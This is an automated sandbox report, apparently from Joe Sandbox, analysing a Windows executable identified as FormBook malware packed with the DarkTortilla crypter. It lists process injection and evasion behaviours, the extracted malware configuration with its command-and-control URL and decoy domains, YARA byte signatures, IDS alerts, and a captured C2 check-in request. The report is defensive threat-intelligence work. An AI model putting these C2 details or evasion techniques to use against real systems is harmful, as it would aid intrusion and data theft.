Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VFylJFPzqX.exe

Overview

General Information

Sample name:VFylJFPzqX.exe
renamed because original name is a hash value
Original sample name:acb23b92beb1de31d7175c94f94854887bc0b2adb90faddc89bf1b14b1bd1a4b.exe
Analysis ID:1524408
MD5:e9e768aa357a7e34348c69e41444964d
SHA1:4930b85e20b7967cf0afb1d9ae9ae57ca4d373c9
SHA256:acb23b92beb1de31d7175c94f94854887bc0b2adb90faddc89bf1b14b1bd1a4b
Tags:172-67-165-197exeuser-JAMESWT_MHT
Infos:

Detection

DarkTortilla, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • VFylJFPzqX.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\VFylJFPzqX.exe" MD5: E9E768AA357A7E34348C69E41444964D)
    • AddInProcess32.exe (PID: 7984 cmdline: "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmmon32.exe (PID: 8104 cmdline: "C:\Windows\SysWOW64\cmmon32.exe" MD5: DEC326E5B4D23503EA5176878DDDB683)
          • cmd.exe (PID: 8148 cmdline: /c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • explorer.exe (PID: 3272 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WerFault.exe (PID: 4124 cmdline: C:\Windows\system32\WerFault.exe -u -p 4084 -s 3228 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.freakyressop.xyz/igbn/"], "decoy": ["daolangfans.com", "creatievecontentpeople.com", "cargizmos.net", "azure1224.xyz", "shopahava.com", "recursum.com", "rumblerain.com", "betmonde396.com", "webinarcerdaskanindonesia.com", "telemaca.com", "hellohurt.com", "peaceprairie.com", "johntheonlinearborist.com", "pilotbxprt.store", "creatingsobriety.com", "getrightspt.com", "104456.com", "travelsofwray.com", "americagroupperu.com", "silberscore.net", "history-poker.site", "readypacks.com", "shillay-live.com", "dx-plastic.com", "fargrerike.com", "s5agents.com", "heatherbbmoore.com", "bangunrumahkreasi.com", "noticeupluy.com", "monicadenis.com", "cothmtest.com", "broomventures.tech", "livewey.net", "df9aztgr1r8i3f.life", "dxttkk.xyz", "musiclessonsandmore.com", "prolongdogslife.com", "gbraises.com", "rusticramble.online", "wellumatheraphy.com", "0658585.com", "nftcopyrights.xyz", "progresivetrade.co", "enet-insaat.com", "validationsystems.online", "mckinleyint.com", "ryanfabius.com", "madhikpahi.website", "readthearchitecture.com", "southforkranchliving.com", "linku-trans.com", "mlharquitectura.com", "brasilbikeshopsc.com", "disneychannelmusicstore.com", "sparksbeauteinc.com", "zmjob.net", "adakis.net", "mouldeddoorsupplier.com", "itk.world", "macherie-kumamoto.com", "123-tecnicos.com", "zalogneked.com", "fliptrade.cfd", "beyoncaeurope.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 40 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.AddInProcess32.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          3.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.AddInProcess32.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18819:$sqlite3step: 68 34 1C 7B E1
          • 0x1892c:$sqlite3step: 68 34 1C 7B E1
          • 0x18848:$sqlite3text: 68 38 2A 90 C5
          • 0x1896d:$sqlite3text: 68 38 2A 90 C5
          • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 9 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-02T18:58:51.666674+020020314531Malware Command and Control Activity Detected192.168.2.84971434.149.87.4580TCP
          2024-10-02T19:00:00.938230+020020314531Malware Command and Control Activity Detected192.168.2.849737191.252.4.2080TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: VFylJFPzqX.exeAvira: detected
          Found malware configuration
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.freakyressop.xyz/igbn/"], "decoy": ["daolangfans.com", "creatievecontentpeople.com", "cargizmos.net", "azure1224.xyz", "shopahava.com", "recursum.com", "rumblerain.com", "betmonde396.com", "webinarcerdaskanindonesia.com", "telemaca.com", "hellohurt.com", "peaceprairie.com", "johntheonlinearborist.com", "pilotbxprt.store", "creatingsobriety.com", "getrightspt.com", "104456.com", "travelsofwray.com", "americagroupperu.com", "silberscore.net", "history-poker.site", "readypacks.com", "shillay-live.com", "dx-plastic.com", "fargrerike.com", "s5agents.com", "heatherbbmoore.com", "bangunrumahkreasi.com", "noticeupluy.com", "monicadenis.com", "cothmtest.com", "broomventures.tech", "livewey.net", "df9aztgr1r8i3f.life", "dxttkk.xyz", "musiclessonsandmore.com", "prolongdogslife.com", "gbraises.com", "rusticramble.online", "wellumatheraphy.com", "0658585.com", "nftcopyrights.xyz", "progresivetrade.co", "enet-insaat.com", "validationsystems.online", "mckinleyint.com", "ryanfabius.com", "madhikpahi.website", "readthearchitecture.com", "southforkranchliving.com", "linku-trans.com", "mlharquitectura.com", "brasilbikeshopsc.com", "disneychannelmusicstore.com", "sparksbeauteinc.com", "zmjob.net", "adakis.net", "mouldeddoorsupplier.com", "itk.world", "macherie-kumamoto.com", "123-tecnicos.com", "zalogneked.com", "fliptrade.cfd", "beyoncaeurope.com"]}
          Multi AV Scanner detection for submitted file
          Source: VFylJFPzqX.exeReversingLabs: Detection: 73%
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: VFylJFPzqX.exeJoe Sandbox ML: detected
          Source: VFylJFPzqX.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000003.00000000.1427689911.0000000000CC2000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000004.00000002.2373426103.00000000106CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2664288495.0000000002678000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2669741591.000000000489F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.2679117867.000000000A6FF000.00000004.80000000.00040000.00000000.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: cmmon32.pdb source: AddInProcess32.exe, 00000003.00000002.1519369707.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000003.00000002.1519293726.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.2660330893.00000000001F0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: AddInProcess32.exe, 00000003.00000002.1519369707.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000003.00000002.1519293726.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2660330893.00000000001F0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.0000000004350000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.00000000044EE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1519005091.0000000003FFE000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1520648011.00000000041A0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.2668080386.0000000004350000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.00000000044EE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1519005091.0000000003FFE000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1520648011.00000000041A0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000003.00000000.1427689911.0000000000CC2000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000004.00000002.2373426103.00000000106CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2664288495.0000000002678000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2669741591.000000000489F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.2679117867.000000000A6FF000.00000004.80000000.00040000.00000000.sdmp, AddInProcess32.exe.0.dr
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 4x nop then jmp 00C38F0Dh0_2_00C389A8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop ebx3_2_00407B1A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi3_2_00416C92
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx5_2_02497B1C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi5_2_024A6C92

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49714 -> 34.149.87.45:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49714 -> 34.149.87.45:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49714 -> 34.149.87.45:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49737 -> 191.252.4.20:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49737 -> 191.252.4.20:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49737 -> 191.252.4.20:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.freakyressop.xyz/igbn/
          Source: global trafficHTTP traffic detected: GET /igbn/?kDKH=K36gPXxmOtT7ZhgLXiyek6cbIzcBFal5uRZotzE1UqqTN+uoUurMQ0X06uvOZOdqSzHy&Rl=YTFLi4d0T2 HTTP/1.1Host: www.mlharquitectura.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.149.87.45 34.149.87.45
          Source: Joe Sandbox ViewIP Address: 34.149.87.45 34.149.87.45
          Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 4_2_10F75F82 getaddrinfo,setsockopt,recv,4_2_10F75F82
          Source: global trafficHTTP traffic detected: GET /igbn/?kDKH=K36gPXxmOtT7ZhgLXiyek6cbIzcBFal5uRZotzE1UqqTN+uoUurMQ0X06uvOZOdqSzHy&Rl=YTFLi4d0T2 HTTP/1.1Host: www.mlharquitectura.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.creatievecontentpeople.com
          Source: global trafficDNS traffic detected: DNS query: www.mlharquitectura.com
          Source: global trafficDNS traffic detected: DNS query: www.cargizmos.net
          Source: global trafficDNS traffic detected: DNS query: api.msn.com
          Source: global trafficDNS traffic detected: DNS query: www.history-poker.site
          Source: global trafficDNS traffic detected: DNS query: www.brasilbikeshopsc.com
          Source: explorer.exe, 00000004.00000002.2363894406.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000005039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000004.00000002.2363894406.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000005039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000004.00000002.2363894406.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000005039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000004.00000000.1463407258.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2361401175.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
          Source: explorer.exe, 00000004.00000002.2363894406.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000005039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000004.00000000.1465481958.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000004.00000002.2363215266.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1462901084.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.2363239402.0000000007720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.123-tecnicos.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.123-tecnicos.com/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.123-tecnicos.com/igbn/www.s5agents.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.123-tecnicos.comReferer:
          Source: explorer.exe, 00000004.00000002.2362200277.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.azure1224.xyz
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.azure1224.xyz/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.azure1224.xyz/igbn/www.musiclessonsandmore.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.azure1224.xyzReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bangunrumahkreasi.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bangunrumahkreasi.com/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bangunrumahkreasi.com/igbn/www.freakyressop.xyz
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bangunrumahkreasi.comReferer:
